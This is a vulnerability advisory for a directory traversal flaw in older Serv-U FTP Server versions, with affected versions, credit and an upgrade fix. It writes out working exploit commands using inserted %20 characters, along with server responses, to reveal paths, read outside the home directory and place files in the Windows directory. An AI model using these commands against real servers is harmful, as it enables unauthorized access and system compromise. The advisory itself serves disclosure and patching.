|
|
|
|
| |
| A security vulnerability in Serv-U FTP Server allows remote attackers with access to files and directories outside the normal scope of the user's FTP home directory. The vulnerability can be used to completely compromise the underlying operating system. |
| |
Credit:
The information has been provided by Zoa_Chien.
|
| |
Vulnerable systems:
Serv-U FTP version 2.4a
Serv-U FTP version 2.5h
Serv-U FTP version 3.0 beta
Immune systems:
Serv-U FTP version 2.5i
By inserting a %20 character (the HEX replacement for space) into a normal GET (file retrieve), PUT (file placement) and CWD (directory changing) commands, a remote attacker is able to access directories and files outside the normal security bounded directory structure.
True path discovery:
By issuing a command with an inserted %20 in the middle of a '\..' request will cause the FTP server to reveal the true directory location. For example:
cd \.%20.
250 Directory changed to /Ftproot
Directory traversal:
By issuing a command with an inserted %20 in the middle of a '\...' (Note the three '.') request, the FTP server can be forced to provide the user with access to a directory outside the normal scope (beyond the user's home directory):
cd \..%20.
250 Directory changed to /..
cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
(NOTE: You can only use this attack when you are in your home directory. So first changing to /winnt and then issuing a "get" will not work)
Putting files outside the scope of the home directory:
The same problem also exist in the PUT command, allowing to do the following:
put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
Exploit summary:
Serv-U FTP Server will:
- Reveal the full path to the ftproot with: cd \.%20. (Even if "show path relative to home dir"-option is on). Using pwd will work too.
- Allows read/write/execute/list access to any other file on the partition of the ftproot if you have read/write/exec/list access on your home dir (Note: that the option inherit sub directories must be clicked on, otherwise the "cd" command will not work).
- Allow listing of hidden files, even if "hide hidden files option is set to on" with "DIR ."
- Exploit also works on Serv-U FTP 2.4a. But you have to use a different string: dir %20..%20%20..\*.
Solution:
Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/
|
|
|
|
|
|
|
